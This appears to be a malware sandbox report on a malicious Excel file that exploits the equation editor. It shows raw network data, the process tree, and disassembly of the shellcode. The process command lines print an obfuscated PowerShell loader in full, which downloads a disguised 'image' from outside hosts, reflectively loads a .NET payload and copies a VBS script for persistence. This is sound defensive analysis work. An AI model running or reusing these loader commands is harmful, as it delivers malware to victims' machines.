2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 Data Ascii: 4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@B
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v

Target ID:	0
Start time:	07:32:15
Start date:	24/04/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13fbf0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:32:34
Start date:	24/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:32:37
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"
Imagebase:	0x170000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:32:40
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreMwDgTreyDgTreGoDgTreLwBvDgTreGIDgTrebQBpDgTreGoDgTreLwB1DgTreGUDgTreLgBzDgTreG4DgTreZDgTreB5DgTreC4DgTreaQBhDgTreGoDgTreYQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTredwBvDgTreHIDgTreZDgTreDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x1210000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:32:41
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
Imagebase:	0x1210000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:32:52
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
Imagebase:	0x1210000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:33:04
Start date:	24/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
Imagebase:	0xff110000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:33:12
Start date:	24/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
Imagebase:	0xff200000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1932, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	43.4%
Total number of Nodes:	53
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0356043D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035603E7,?,00000000,00000000), ref: 0356043F

Part of subcall function 03560487: ShellExecuteExW.SHELL32(0000003C), ref: 035604A9
Part of subcall function 03560487: ExitProcess.KERNEL32(00000000), ref: 035604C1

Strings

<, xrefs: 03560453

Memory Dump Source

Source File: 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
Instruction ID: e8e6800bc09817b1a64517afaee5278ed55d27d2c620d23a0db6639e37f4e075
Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
Instruction Fuzzy Hash: AD01D6B550C3846BD771E774A89876BBFE5FFC4201F154D999486871F2EE34C8048605

Uniqueness

Uniqueness Score: -1.00%

Function 03560487 Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
Instruction ID: 6d13a457ec759677fef4f5f9b671ccd036832e55740e836300101a3c4c8fcfb7
Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
Instruction Fuzzy Hash: E201F9E880C30A65CA74F738F4A42BBEBD0FFA1301FDC8896D492470F5E52484C38619

Uniqueness

Uniqueness Score: -1.00%

Function 0356049E Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 035604A9

Part of subcall function 035604BC: ExitProcess.KERNEL32(00000000), ref: 035604C1

Memory Dump Source

Source File: 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
Instruction ID: c553ec6a9f52ea9ebfb6dbd76d4a9407bb5c3f8f5879d0b7b908f3b4ae9af0dd
Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
Instruction Fuzzy Hash: 63F0A4D990C34252CB74F678F8747BBAB55BFB1211FCC8C969892470F5E55881C38619

Uniqueness

Uniqueness Score: -1.00%

Function 035603BC Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(035603AE), ref: 035603BC

Memory Dump Source

Source File: 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0ccf8fe45d441761af979b68668cbf62ad66b421ab49b066c00b8cc2fb9ff396
Instruction ID: 8cea109d5bbde8c2d2375e90077bf2df688effb1bc99af6083d66f13b1b58aad
Opcode Fuzzy Hash: 0ccf8fe45d441761af979b68668cbf62ad66b421ab49b066c00b8cc2fb9ff396
Instruction Fuzzy Hash: C31145A1A4C7D11FD726C7346D3AB65BF687B13506F0DCACED4860B1E3D390A102C696

Uniqueness

Uniqueness Score: -1.00%

Function 035604BC Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 035604C1

Memory Dump Source

Source File: 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
Instruction ID: 720ab486df07d4e424e74d83fcef318aa00142a0982c1e1765a5ea19faa6c9a4
